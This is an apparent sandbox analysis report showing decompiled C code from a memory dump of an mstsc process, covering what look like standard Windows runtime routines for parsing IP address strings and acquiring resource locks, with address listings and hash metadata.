                                              • Instruction Fuzzy Hash: 0F41FA3168030D7EEB609E94DCC5FDAB3BDBF58704F0404ADA605E6180E770EA458F68
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E02600B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                              				signed int _v8;
                                              				signed int _v12;
                                              				signed int _v16;
                                              				signed int _v20;
                                              				signed int _v24;
                                              				signed int _v28;
                                              				signed int _v32;
                                              				void* _t108;
                                              				void* _t116;
                                              				char _t120;
                                              				short _t121;
                                              				void* _t128;
                                              				intOrPtr* _t130;
                                              				char _t132;
                                              				short _t133;
                                              				intOrPtr _t141;
                                              				signed int _t156;
                                              				signed int _t174;
                                              				intOrPtr _t177;
                                              				intOrPtr* _t179;
                                              				intOrPtr _t180;
                                              				void* _t183;
                                              
                                              				_t179 = _a4;
                                              				_t141 =  *_t179;
                                              				_v16 = 0;
                                              				_v28 = 0;
                                              				_v8 = 0;
                                              				_v24 = 0;
                                              				_v12 = 0;
                                              				_v32 = 0;
                                              				_v20 = 0;
                                              				if(_t141 == 0) {
                                              					L41:
                                              					 *_a8 = _t179;
                                              					_t180 = _v24;
                                              					if(_t180 != 0) {
                                              						if(_t180 != 3) {
                                              							goto L6;
                                              						}
                                              						_v8 = _v8 + 1;
                                              					}
                                              					_t174 = _v32;
                                              					if(_t174 == 0) {
                                              						if(_v8 == 7) {
                                              							goto L43;
                                              						}
                                              						goto L6;
                                              					}
                                              					L43:
                                              					if(_v16 != 1) {
                                              						if(_v16 != 2) {
                                              							goto L6;
                                              						}
                                              						 *((short*)(_a12 + _v20 * 2)) = 0;
                                              						L47:
                                              						if(_t174 != 0) {
                                              							E025D8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                              							_t116 = 8;
                                              							E025CDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                              						}
                                              						return 0;
                                              					}
                                              					if(_t180 != 0) {
                                              						if(_v12 > 3) {
                                              							goto L6;
                                              						}
                                              						_t120 = E02600CFA(_v28, 0, 0xa);
                                              						_t183 = _t183 + 0xc;
                                              						if(_t120 > 0xff) {
                                              							goto L6;
                                              						}
                                              						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                              						goto L47;
                                              					}
                                              					if(_v12 > 4) {
                                              						goto L6;
                                              					}
                                              					_t121 = E02600CFA(_v28, _t180, 0x10);
                                              					_t183 = _t183 + 0xc;
                                              					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                              					goto L47;
                                              				} else {
                                              					while(1) {
                                              						_t123 = _v16;
                                              						if(_t123 == 0) {
                                              							goto L7;
                                              						}
                                              						_t108 = _t123 - 1;
                                              						if(_t108 != 0) {
                                              							goto L1;
                                              						}
                                              						_t178 = _t141;
                                              						if(E026006BA(_t108, _t141) == 0 || _t135 == 0) {
                                              							if(E026006BA(_t135, _t178) == 0 || E02600A5B(_t136, _t178) == 0) {
                                              								if(_t141 != 0x3a) {
                                              									if(_t141 == 0x2e) {
                                              										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                              											goto L41;
                                              										} else {
                                              											_v24 = _v24 + 1;
                                              											L27:
                                              											_v16 = _v16 & 0x00000000;
                                              											L28:
                                              											if(_v28 == 0) {
                                              												goto L20;
                                              											}
                                              											_t177 = _v24;
                                              											if(_t177 != 0) {
                                              												if(_v12 > 3) {
                                              													L6:
                                              													return 0xc000000d;
                                              												}
                                              												_t132 = E02600CFA(_v28, 0, 0xa);
                                              												_t183 = _t183 + 0xc;
                                              												if(_t132 > 0xff) {
                                              													goto L6;
                                              												}
                                              												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                              												goto L20;
                                              											}
                                              											if(_v12 > 4) {
                                              												goto L6;
                                              											}
                                              											_t133 = E02600CFA(_v28, 0, 0x10);
                                              											_t183 = _t183 + 0xc;
                                              											_v20 = _v20 + 1;
                                              											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                              											goto L20;
                                              										}
                                              									}
                                              									goto L41;
                                              								}
                                              								if(_v24 > 0 || _v8 > 6) {
                                              									goto L41;
                                              								} else {
                                              									_t130 = _t179 + 1;
                                              									if( *_t130 == _t141) {
                                              										if(_v32 != 0) {
                                              											goto L41;
                                              										}
                                              										_v32 = _v8 + 1;
                                              										_t156 = 2;
                                              										_v8 = _v8 + _t156;
                                              										L34:
                                              										_t179 = _t130;
                                              										_v16 = _t156;
                                              										goto L28;
                                              									}
                                              									_v8 = _v8 + 1;
                                              									goto L27;
                                              								}
                                              							} else {
                                              								_v12 = _v12 + 1;
                                              								if(_v24 > 0) {
                                              									goto L41;
                                              								}
                                              								_a7 = 1;
                                              								goto L20;
                                              							}
                                              						} else {
                                              							_v12 = _v12 + 1;
                                              							L20:
                                              							_t179 = _t179 + 1;
                                              							_t141 =  *_t179;
                                              							if(_t141 == 0) {
                                              								goto L41;
                                              							}
                                              							continue;
                                              						}
                                              						L7:
                                              						if(_t141 == 0x3a) {
                                              							if(_v24 > 0 || _v8 > 0) {
                                              								goto L41;
                                              							} else {
                                              								_t130 = _t179 + 1;
                                              								if( *_t130 != _t141) {
                                              									goto L41;
                                              								}
                                              								_v20 = _v20 + 1;
                                              								_t156 = 2;
                                              								_v32 = 1;
                                              								_v8 = _t156;
                                              								 *((short*)(_a12 + _v20 * 2)) = 0;
                                              								goto L34;
                                              							}
                                              						}
                                              						L8:
                                              						if(_v8 > 7) {
                                              							goto L41;
                                              						}
                                              						_t142 = _t141;
                                              						if(E026006BA(_t123, _t141) == 0 || _t124 == 0) {
                                              							if(E026006BA(_t124, _t142) == 0 || E02600A5B(_t125, _t142) == 0 || _v24 > 0) {
                                              								goto L41;
                                              							} else {
                                              								_t128 = 1;
                                              								_a7 = 1;
                                              								_v28 = _t179;
                                              								_v16 = 1;
                                              								_v12 = 1;
                                              								L39:
                                              								if(_v16 == _t128) {
                                              									goto L20;
                                              								}
                                              								goto L28;
                                              							}
                                              						} else {
                                              							_a7 = 0;
                                              							_v28 = _t179;
                                              							_v16 = 1;
                                              							_v12 = 1;
                                              							goto L20;
                                              						}
                                              					}
                                              				}
                                              				L1:
                                              				_t123 = _t108 == 1;
                                              				if(_t108 == 1) {
                                              					goto L8;
                                              				}
                                              				_t128 = 1;
                                              				goto L39;
                                              			}

























                                              0x02600b21
                                              0x02600b24
                                              0x02600b27
                                              0x02600b2a
                                              0x02600b2d
                                              0x02600b30
                                              0x02600b33
                                              0x02600b36
                                              0x02600b39
                                              0x02600b3e
                                              0x02600c65
                                              0x02600c68
                                              0x02600c6a
                                              0x02600c6f
                                              0x0262eb42
                                              0x00000000
                                              0x00000000
                                              0x0262eb48
                                              0x0262eb48
                                              0x02600c75
                                              0x02600c7a
                                              0x0262eb54
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0262eb5a
                                              0x02600c80
                                              0x02600c84
                                              0x0262eb98
                                              0x00000000
                                              0x00000000
                                              0x0262eba6
                                              0x02600cb8
                                              0x02600cba
                                              0x02600cd3
                                              0x02600cda
                                              0x02600ce4
                                              0x02600ce9
                                              0x00000000
                                              0x02600cec
                                              0x02600c8c
                                              0x0262eb63
                                              0x00000000
                                              0x00000000
                                              0x0262eb70
                                              0x0262eb75
                                              0x0262eb7d
                                              0x00000000
                                              0x00000000
                                              0x0262eb8c
                                              0x00000000
                                              0x0262eb8c
                                              0x02600c96
                                              0x00000000
                                              0x00000000
                                              0x02600ca2
                                              0x02600cac
                                              0x02600cb4
                                              0x00000000
                                              0x00000000
                                              0x02600b44
                                              0x02600b47
                                              0x02600b49
                                              0x00000000
                                              0x00000000
                                              0x02600b4f
                                              0x02600b50
                                              0x00000000
                                              0x00000000
                                              0x02600b56
                                              0x02600b62
                                              0x02600b7c
                                              0x02600bac
                                              0x02600a0f
                                              0x0262eaaa
                                              0x00000000
                                              0x0262eac4
                                              0x0262eac4
                                              0x02600bd0
                                              0x02600bd0
                                              0x02600bd4
                                              0x02600bd9
                                              0x00000000
                                              0x00000000
                                              0x02600bdb
                                              0x02600be0
                                              0x0262eb0e
                                              0x02600a1a
                                              0x00000000
                                              0x02600a1a
                                              0x0262eb1a
                                              0x0262eb1f
                                              0x0262eb27
                                              0x00000000
                                              0x00000000
                                              0x0262eb36
                                              0x00000000
                                              0x0262eb36
                                              0x02600bea
                                              0x00000000
                                              0x00000000
                                              0x02600bf6
                                              0x02600c00
                                              0x02600c03
                                              0x02600c0b
                                              0x00000000
                                              0x02600c0b
                                              0x0262eaaa
                                              0x00000000
                                              0x02600a15
                                              0x02600bb6
                                              0x00000000
                                              0x02600bc6
                                              0x02600bc6
                                              0x02600bcb
                                              0x02600c15
                                              0x00000000
                                              0x00000000
                                              0x02600c1d
                                              0x02600c20
                                              0x02600c21
                                              0x02600c24
                                              0x02600c24
                                              0x02600c26
                                              0x00000000
                                              0x02600c26
                                              0x02600bcd
                                              0x00000000
                                              0x02600bcd
                                              0x02600b89
                                              0x02600b89
                                              0x02600b90
                                              0x00000000
                                              0x00000000
                                              0x02600b96
                                              0x00000000
                                              0x02600b96
                                              0x02600a04
                                              0x02600a04
                                              0x02600b9a
                                              0x02600b9a
                                              0x02600b9b
                                              0x02600b9f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02600ba5
                                              0x02600ac7
                                              0x02600aca
                                              0x0262eacf
                                              0x00000000
                                              0x0262eade
                                              0x0262eade
                                              0x0262eae3
                                              0x00000000
                                              0x00000000
                                              0x0262eaf3
                                              0x0262eaf6
                                              0x0262eaf7
                                              0x0262eafe
                                              0x0262eb01
                                              0x00000000
                                              0x0262eb01
                                              0x0262eacf
                                              0x02600ad0
                                              0x02600ad4
                                              0x00000000
                                              0x00000000
                                              0x02600ada
                                              0x02600ae6
                                              0x02600c34
                                              0x00000000
                                              0x02600c47
                                              0x02600c49
                                              0x02600c4a
                                              0x02600c4e
                                              0x02600c51
                                              0x02600c54
                                              0x02600c57
                                              0x02600c5a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02600c60
                                              0x02600afb
                                              0x02600afe
                                              0x02600b02
                                              0x02600b05
                                              0x02600b08
                                              0x00000000
                                              0x02600b08
                                              0x02600ae6
                                              0x02600b44
                                              0x026009f8
                                              0x026009f8
                                              0x026009f9
                                              0x00000000
                                              0x00000000
                                              0x0262eaa0
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: __fassign
                                              • String ID: .$:$:
                                              • API String ID: 3965848254-2308638275
                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                              • Instruction ID: 39d1c1a4897e0aeb9e9c60d99138f4d2489b4baa1b75941af4b63d2ccb3920da
                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                              • Instruction Fuzzy Hash: 5DA19E7190020ADECF2CCFA8C8847BFB7B5AF05309F24846AD842A73C1D7319649EB56
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 49%
                                              			E02600554(signed int _a4, char _a8) {
                                              				void* __ebx;
                                              				void* __edi;
                                              				void* __esi;
                                              				signed int* _t49;
                                              				signed int _t51;
                                              				signed int _t56;
                                              				signed int _t58;
                                              				signed int _t61;
                                              				signed int _t63;
                                              				void* _t66;
                                              				intOrPtr _t67;
                                              				signed int _t70;
                                              				void* _t75;
                                              				signed int _t81;
                                              				signed int _t84;
                                              				void* _t86;
                                              				signed int _t93;
                                              				signed int _t96;
                                              				intOrPtr _t105;
                                              				signed int _t107;
                                              				void* _t110;
                                              				signed int _t115;
                                              				signed int* _t119;
                                              				void* _t125;
                                              				void* _t126;
                                              				signed int _t128;
                                              				signed int _t130;
                                              				signed int _t138;
                                              				signed int _t144;
                                              				void* _t158;
                                              				void* _t159;
                                              				void* _t160;
                                              
                                              				_t96 = _a4;
                                              				_t115 =  *(_t96 + 0x28);
                                              				_push(_t138);
                                              				if(_t115 < 0) {
                                              					_t105 =  *[fs:0x18];
                                              					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                              					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                              						goto L6;
                                              					} else {
                                              						__eflags = _t115 | 0xffffffff;
                                              						asm("lock xadd [eax], edx");
                                              						return 1;
                                              					}
                                              				} else {
                                              					L6:
                                              					_push(_t128);
                                              					while(1) {
                                              						L7:
                                              						__eflags = _t115;
                                              						if(_t115 >= 0) {
                                              							break;
                                              						}
                                              						__eflags = _a8;
                                              						if(_a8 == 0) {
                                              							__eflags = 0;
                                              							return 0;
                                              						} else {
                                              							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                              							_t49 = _t96 + 0x1c;
                                              							_t106 = 1;
                                              							asm("lock xadd [edx], ecx");
                                              							_t115 =  *(_t96 + 0x28);
                                              							__eflags = _t115;
                                              							if(_t115 < 0) {
                                              								L23:
                                              								_t130 = 0;
                                              								__eflags = 0;
                                              								while(1) {
                                              									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                              									asm("sbb esi, esi");
                                              									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026a01c0;
                                              									_push(_t144);
                                              									_push(0);
                                              									_t51 = E025BF8CC( *((intOrPtr*)(_t96 + 0x18)));
                                              									__eflags = _t51 - 0x102;
                                              									if(_t51 != 0x102) {
                                              										break;
                                              									}
                                              									_t106 =  *(_t144 + 4);
                                              									_t126 =  *_t144;
                                              									_t86 = E02604FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                              									_push(_t126);
                                              									_push(_t86);
                                              									E02613F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                              									E02613F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                              									_t130 = _t130 + 1;
                                              									_t160 = _t158 + 0x28;
                                              									__eflags = _t130 - 2;
                                              									if(__eflags > 0) {
                                              										E0264217A(_t106, __eflags, _t96);
                                              									}
                                              									_push("RTL: Re-Waiting\n");
                                              									_push(0);
                                              									_push(0x65);
                                              									E02613F92();
                                              									_t158 = _t160 + 0xc;
                                              								}
                                              								__eflags = _t51;
                                              								if(__eflags < 0) {
                                              									_push(_t51);
                                              									E02603915(_t96, _t106, _t118, _t130, _t144, __eflags);
                                              									asm("int3");
                                              									while(1) {
                                              										L32:
                                              										__eflags = _a8;
                                              										if(_a8 == 0) {
                                              											break;
                                              										}
                                              										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                              										_t119 = _t96 + 0x24;
                                              										_t107 = 1;
                                              										asm("lock xadd [eax], ecx");
                                              										_t56 =  *(_t96 + 0x28);
                                              										_a4 = _t56;
                                              										__eflags = _t56;
                                              										if(_t56 != 0) {
                                              											L40:
                                              											_t128 = 0;
                                              											__eflags = 0;
                                              											while(1) {
                                              												_t121 =  *(_t96 + 0x30) & 0x00000001;
                                              												asm("sbb esi, esi");
                                              												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x026a01c0;
                                              												_push(_t138);
                                              												_push(0);
                                              												_t58 = E025BF8CC( *((intOrPtr*)(_t96 + 0x20)));
                                              												__eflags = _t58 - 0x102;
                                              												if(_t58 != 0x102) {
                                              													break;
                                              												}
                                              												_t107 =  *(_t138 + 4);
                                              												_t125 =  *_t138;
                                              												_t75 = E02604FC0(_t125, _t107, 0xff676980, 0xffffffff);
                                              												_push(_t125);
                                              												_push(_t75);
                                              												E02613F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
                                              												E02613F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                              												_t128 = _t128 + 1;
                                              												_t159 = _t158 + 0x28;
                                              												__eflags = _t128 - 2;
                                              												if(__eflags > 0) {
                                              													E0264217A(_t107, __eflags, _t96);
                                              												}
                                              												_push("RTL: Re-Waiting\n");
                                              												_push(0);
                                              												_push(0x65);
                                              												E02613F92();
                                              												_t158 = _t159 + 0xc;
                                              											}
                                              											__eflags = _t58;
                                              											if(__eflags < 0) {
                                              												_push(_t58);
                                              												E02603915(_t96, _t107, _t121, _t128, _t138, __eflags);
                                              												asm("int3");
                                              												_t61 =  *_t107;
                                              												 *_t107 = 0;
                                              												__eflags = _t61;
                                              												if(_t61 == 0) {
                                              													L1:
                                              													_t63 = E025E5384(_t138 + 0x24);
                                              													if(_t63 != 0) {
                                              														goto L52;
                                              													} else {
                                              														goto L2;
                                              													}
                                              												} else {
                                              													_t123 =  *((intOrPtr*)(_t138 + 0x18));
                                              													_push( &_a4);
                                              													_push(_t61);
                                              													_t70 = E025BF970( *((intOrPtr*)(_t138 + 0x18)));
                                              													__eflags = _t70;
                                              													if(__eflags >= 0) {
                                              														goto L1;
                                              													} else {
                                              														_push(_t70);
                                              														E02603915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
                                              														L52:
                                              														_t122 =  *((intOrPtr*)(_t138 + 0x20));
                                              														_push( &_a4);
                                              														_push(1);
                                              														_t63 = E025BF970( *((intOrPtr*)(_t138 + 0x20)));
                                              														__eflags = _t63;
                                              														if(__eflags >= 0) {
                                              															L2:
                                              															return _t63;
                                              														} else {
                                              															_push(_t63);
                                              															E02603915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
                                              															_t109 =  *((intOrPtr*)(_t138 + 0x20));
                                              															_push( &_a4);
                                              															_push(1);
                                              															_t63 = E025BF970( *((intOrPtr*)(_t138 + 0x20)));
                                              															__eflags = _t63;
                                              															if(__eflags >= 0) {
                                              																goto L2;
                                              															} else {
                                              																_push(_t63);
                                              																_t66 = E02603915(_t96, _t109, _t122, _t128, _t138, __eflags);
                                              																asm("int3");
                                              																while(1) {
                                              																	_t110 = _t66;
                                              																	__eflags = _t66 - 1;
                                              																	if(_t66 != 1) {
                                              																		break;
                                              																	}
                                              																	_t128 = _t128 | 0xffffffff;
                                              																	_t66 = _t110;
                                              																	asm("lock cmpxchg [ebx], edi");
                                              																	__eflags = _t66 - _t110;
                                              																	if(_t66 != _t110) {
                                              																		continue;
                                              																	} else {
                                              																		_t67 =  *[fs:0x18];
                                              																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
                                              																		return _t67;
                                              																	}
                                              																	goto L58;
                                              																}
                                              																E025E5329(_t110, _t138);
                                              																return E025E53A5(_t138, 1);
                                              															}
                                              														}
                                              													}
                                              												}
                                              											} else {
                                              												_t56 =  *(_t96 + 0x28);
                                              												goto L3;
                                              											}
                                              										} else {
                                              											_t107 =  *_t119;
                                              											__eflags = _t107;
                                              											if(__eflags > 0) {
                                              												while(1) {
                                              													_t81 = _t107;
                                              													asm("lock cmpxchg [edi], esi");
                                              													__eflags = _t81 - _t107;
                                              													if(_t81 == _t107) {
                                              														break;
                                              													}
                                              													_t107 = _t81;
                                              													__eflags = _t81;
                                              													if(_t81 > 0) {
                                              														continue;
                                              													}
                                              													break;
                                              												}
                                              												_t56 = _a4;
                                              												__eflags = _t107;
                                              											}
                                              											if(__eflags != 0) {
                                              												while(1) {
                                              													L3:
                                              													__eflags = _t56;
                                              													if(_t56 != 0) {
                                              														goto L32;
                                              													}
                                              													_t107 = _t107 | 0xffffffff;
                                              													_t56 = 0;
                                              													asm("lock cmpxchg [edx], ecx");
                                              													__eflags = 0;
                                              													if(0 != 0) {
                                              														continue;
                                              													} else {
                                              														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                              														return 1;
                                              													}
                                              													goto L58;
                                              												}
                                              												continue;
                                              											} else {
                                              												goto L40;
                                              											}
                                              										}
                                              										goto L58;
                                              									}
                                              									__eflags = 0;
                                              									return 0;
                                              								} else {
                                              									_t115 =  *(_t96 + 0x28);
                                              									continue;
                                              								}
                                              							} else {
                                              								_t106 =  *_t49;
                                              								__eflags = _t106;
                                              								if(__eflags > 0) {
                                              									while(1) {
                                              										_t93 = _t106;
                                              										asm("lock cmpxchg [edi], esi");
                                              										__eflags = _t93 - _t106;
                                              										if(_t93 == _t106) {
                                              											break;
                                              										}
                                              										_t106 = _t93;
                                              										__eflags = _t93;
                                              										if(_t93 > 0) {
                                              											continue;
                                              										}
                                              										break;
                                              									}
                                              									__eflags = _t106;
                                              								}
                                              								if(__eflags != 0) {
                                              									continue;
                                              								} else {
                                              									goto L23;
                                              								}
                                              							}
                                              						}
                                              						goto L58;
                                              					}
                                              					_t84 = _t115;
                                              					asm("lock cmpxchg [esi], ecx");
                                              					__eflags = _t84 - _t115;
                                              					if(_t84 != _t115) {
                                              						_t115 = _t84;
                                              						goto L7;
                                              					} else {
                                              						return 1;
                                              					}
                                              				}
                                              				L58:
                                              			}



































                                              0x0260055a
                                              0x0260055d
                                              0x02600563
                                              0x02600566
                                              0x026005d8
                                              0x026005e2
                                              0x026005e5
                                              0x00000000
                                              0x026005e7
                                              0x026005e7
                                              0x026005ea
                                              0x026005f3
                                              0x026005f3
                                              0x02600568
                                              0x02600568
                                              0x02600568
                                              0x02600569
                                              0x02600569
                                              0x02600569
                                              0x0260056b
                                              0x00000000
                                              0x00000000
                                              0x0262217f
                                              0x02622183
                                              0x0262225b
                                              0x0262225f
                                              0x02622189
                                              0x0262218c
                                              0x0262218f
                                              0x02622194
                                              0x02622199
                                              0x0262219d
                                              0x026221a0
                                              0x026221a2
                                              0x026221ce
                                              0x026221ce
                                              0x026221ce
                                              0x026221d0
                                              0x026221d6
                                              0x026221de
                                              0x026221e2
                                              0x026221e8
                                              0x026221e9
                                              0x026221ec
                                              0x026221f1
                                              0x026221f6
                                              0x00000000
                                              0x00000000
                                              0x026221f8
                                              0x026221fb
                                              0x02622206
                                              0x0262220b
                                              0x0262220c
                                              0x02622217
                                              0x02622226
                                              0x0262222b
                                              0x0262222c
                                              0x0262222f
                                              0x02622232
                                              0x02622235
                                              0x02622235
                                              0x0262223a
                                              0x0262223f
                                              0x02622241
                                              0x02622243
                                              0x02622248
                                              0x02622248
                                              0x0262224d
                                              0x0262224f
                                              0x02622262
                                              0x02622263
                                              0x02622268
                                              0x02622269
                                              0x02622269
                                              0x02622269
                                              0x0262226d
                                              0x00000000
                                              0x00000000
                                              0x02622276
                                              0x02622279
                                              0x0262227e
                                              0x02622283
                                              0x02622287
                                              0x0262228a
                                              0x0262228d
                                              0x0262228f
                                              0x026222bc
                                              0x026222bc
                                              0x026222bc
                                              0x026222be
                                              0x026222c4
                                              0x026222cc
                                              0x026222d0
                                              0x026222d6
                                              0x026222d7
                                              0x026222da
                                              0x026222df
                                              0x026222e4
                                              0x00000000
                                              0x00000000
                                              0x026222e6
                                              0x026222e9
                                              0x026222f4
                                              0x026222f9
                                              0x026222fa
                                              0x02622305
                                              0x02622314
                                              0x02622319
                                              0x0262231a
                                              0x0262231d
                                              0x02622320
                                              0x02622323
                                              0x02622323
                                              0x02622328
                                              0x0262232d
                                              0x0262232f
                                              0x02622331
                                              0x02622336
                                              0x02622336
                                              0x0262233b
                                              0x0262233d
                                              0x02622350
                                              0x02622351
                                              0x02622356
                                              0x02622359
                                              0x02622359
                                              0x0262235b
                                              0x0262235d
                                              0x025e5367
                                              0x025e536b
                                              0x025e5372
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02622363
                                              0x02622363
                                              0x02622369
                                              0x0262236a
                                              0x0262236c
                                              0x02622371
                                              0x02622373
                                              0x00000000
                                              0x02622379
                                              0x02622379
                                              0x0262237a
                                              0x0262237f
                                              0x0262237f
                                              0x02622385
                                              0x02622386
                                              0x02622389
                                              0x0262238e
                                              0x02622390
                                              0x025e5378
                                              0x025e537c
                                              0x02622396
                                              0x02622396
                                              0x02622397
                                              0x0262239c
                                              0x026223a2
                                              0x026223a3
                                              0x026223a6
                                              0x026223ab
                                              0x026223ad
                                              0x00000000
                                              0x026223b3
                                              0x026223b3
                                              0x026223b4
                                              0x026223b9
                                              0x026223ba
                                              0x026223ba
                                              0x026223bc
                                              0x026223bf
                                              0x00000000
                                              0x00000000
                                              0x02619153
                                              0x02619158
                                              0x0261915a
                                              0x0261915e
                                              0x02619160
                                              0x00000000
                                              0x02619166
                                              0x02619166
                                              0x02619171
                                              0x02619176
                                              0x02619176
                                              0x00000000
                                              0x02619160
                                              0x026223c6
                                              0x026223d7
                                              0x026223d7
                                              0x026223ad
                                              0x02622390
                                              0x02622373
                                              0x0262233f
                                              0x0262233f
                                              0x00000000
                                              0x0262233f
                                              0x02622291
                                              0x02622291
                                              0x02622293
                                              0x02622295
                                              0x0262229a
                                              0x026222a1
                                              0x026222a3
                                              0x026222a7
                                              0x026222a9
                                              0x00000000
                                              0x00000000
                                              0x026222ab
                                              0x026222ad
                                              0x026222af
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026222af
                                              0x026222b1
                                              0x026222b4
                                              0x026222b4
                                              0x026222b6
                                              0x025e53be
                                              0x025e53be
                                              0x025e53be
                                              0x025e53c0
                                              0x00000000
                                              0x00000000
                                              0x025e53cb
                                              0x025e53ce
                                              0x025e53d0
                                              0x025e53d4
                                              0x025e53d6
                                              0x00000000
                                              0x025e53d8
                                              0x025e53e3
                                              0x025e53ea
                                              0x025e53ea
                                              0x00000000
                                              0x025e53d6
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026222b6
                                              0x00000000
                                              0x0262228f
                                              0x02622349
                                              0x0262234d
                                              0x02622251
                                              0x02622251
                                              0x00000000
                                              0x02622251
                                              0x026221a4
                                              0x026221a4
                                              0x026221a6
                                              0x026221a8
                                              0x026221ac
                                              0x026221b6
                                              0x026221b8
                                              0x026221bc
                                              0x026221be
                                              0x00000000
                                              0x00000000
                                              0x026221c0
                                              0x026221c2
                                              0x026221c4
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026221c4
                                              0x026221c6
                                              0x026221c6
                                              0x026221c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x026221c8
                                              0x026221a2
                                              0x00000000
                                              0x02622183
                                              0x0260057b
                                              0x0260057d
                                              0x02600581
                                              0x02600583
                                              0x02622178
                                              0x00000000
                                              0x02600589
                                              0x0260058f
                                              0x0260058f
                                              0x02600583
                                              0x00000000

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02622206
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.1178870899.00000000025B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true
                                              • Associated: 0000000B.00000002.1178861357.00000000025A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178956625.0000000002690000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178965473.00000000026A0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178974167.00000000026A4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178983628.00000000026A7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1178993053.00000000026B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000B.00000002.1179035355.0000000002710000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_11_2_25a0000_mstsc.jbxd
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                              • API String ID: 885266447-4236105082
                                              • Opcode ID: d5faa3369b012cda4a5575a2ba134e1324e171e36c22f8c614164ee387820cf9
                                              • Instruction ID: 2ef1f986935ca2b13b55c9fa54c7977dd7bfa71d2443e35035345f24f9618bd9
                                              • Opcode Fuzzy Hash: d5faa3369b012cda4a5575a2ba134e1324e171e36c22f8c614164ee387820cf9
                                              • Instruction Fuzzy Hash: 305139357006216FEB198E18CCD0FA633AAAF84724F25826DFD45DB384EA31EC458F94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 64%
